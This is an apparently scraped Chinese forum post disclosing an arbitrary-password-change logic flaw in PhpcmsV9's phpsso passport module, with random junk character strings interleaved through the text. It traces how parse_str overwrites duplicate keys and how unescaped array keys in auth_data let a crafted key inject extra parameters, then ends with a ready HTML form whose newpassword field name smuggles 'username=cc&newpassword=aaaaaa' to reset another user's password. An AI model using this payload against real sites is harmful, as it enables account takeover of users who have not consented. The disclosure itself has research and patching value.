PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
/ @" J* C; ?; N7 A: Y
  |- {. {6 D: Y  `* {, _" M
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
! e- y7 Z/ _1 U9 N  U) o
8 o1 I7 N, f+ I! U3 w+ v在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。

我把它留给了你们。
/ F" r6 w1 `/ \8 C8 n6 Q不知道你们发现了它没有。

我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。

所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。
* g7 S2 k' N- @; ]" e7 B0 ?" P
0 u4 R/ L0 n. h$ q' I! d/ i8 }也就是

8 |' s' \/ B# Z. V: c  Yusername=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。
, r1 z. H; ~2 L) P
/ w5 f. _2 V. q3 R0 c! ~/ x; _要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
+ Y6 I" f  F/ F# O6 G! K! ^
' d  h" M+ X, @: \# E, G
/ |" E) `" d( h7 S: j  h4 N其实我们有这样的机会，看看代码，如下：

) V/ f& F+ g8 ^
public function auth_data($data) {
% r' S* d* l0 a" }: |3 W( o                $s = $sep = '';
                foreach($data as $k => $v) {
                        if(is_array($v)) {
                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
8 b0 Z0 j6 a8 l                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
/ F* ?$ C. @2 n2 o2 I" J                                        $sep2 = '&';
                                }
                                $s .= $sep.$s2;
1 X5 l" c. ^; m  `' ]: ~! a' s( ?                        } else {
5 s$ l+ z+ q' }. v+ D* o, i8 Y                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
                        }
                        $sep = '&';
                }

                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
0 b* g) X/ p2 }9 l9 f. o' P                return $auth_s;
        }
) y3 N3 a5 A' ^3 ~
; v# P# ~1 p: Q可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。
3 ?  E0 r, }( k, z5 q0 h3 U
/ {& E% g. y4 R2 A# F/ M7 j2 u举个例子
" F, a0 Q* a8 d) o
$a[aaa=a&bbb] = 'a';
) E" q5 h# h: n1 l
会变成aaa=a&bbb=a
& X" U; A% e$ }, R( n
明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

这个时候，我们可以再去看一个函数。
8 f+ b8 M/ z7 i* a
  M4 ~: D. J' n# n就在这个文件内：

, U- \+ L$ s4 B7 u' [
$ x# Z7 Z$ s0 T# L1 cpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
                if($email && !$this->_is_email($email)) {
                        return -4;
                }
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }

这是向通行证发了这样一个请求。
$ n: n; [" B1 L
我们再跟到通信证代码里去看看，就会有所发现。
* K( }) [3 u2 B) k( `8 k4 `! l
6 k" q) J1 t6 G8 F$ C8 W
( h5 r/ F, {- V' t' V6 apublic function edit() {
- a+ F9 V  a: r7 S3 A7 Z3 L//能省就省，太长了不是吗？
6 a& w: O# ^& u
5 F4 Q4 R; Z2 _1 h( Pif($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
- C1 A' R3 i  J9 x3 [                                $res = $this->db->update($data, array('username'=>$this->username));
7 I' U4 e7 |* v( ^, f  N: G                        } else {
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
, @! B3 i6 a0 {4 [) e( i/ X                                $res = $this->db->update($data, array('uid'=>$this->uid));
/ x' t1 {! j0 p# |# w                        }
0 f$ d  ]/ D0 G$ x% ^# }( _, T( K
好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')

很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。

& m; q7 s( G$ q5 s+ f, c- W$ d我当然找到了：
8 S3 O" X$ i0 O$ O1 `' r/ @( ?- [phpcms9/phpcms/modules/member/index.php

  w. Q6 @( Z! i: G' `7 z9 O( a+ y$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
7 N( H, ?" g, b  r, i4 L! W
然后就没有然后了。
1 w/ n- v) Z, n1 h
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
                                                <th width="80">邮箱：</th>        
* W6 T# u, \6 P9 q% Y( T                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
) v7 d9 s( D) m( p" o                                        </tr>
0 v5 C. x2 _" k3 {. a3 f                                        <tr>
  y- e. \& G$ G- Y5 C                                                <th width="80">原密码：</th>        
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
, Q* M% ~+ G  C                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
                                        </tr>
                                        <th></th>
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
- X  d, O# @+ Q0 P$ I                                        </tr>
/ V$ \4 F! s) ?" d) f) L                                </table>

% x( b* o( _' @  z% [% o% q4 F                               
2 P5 }& Z2 T# x' H1 E/ |; ^                        </form>
; m4 k0 W' b' ]% G  a1 Q$ W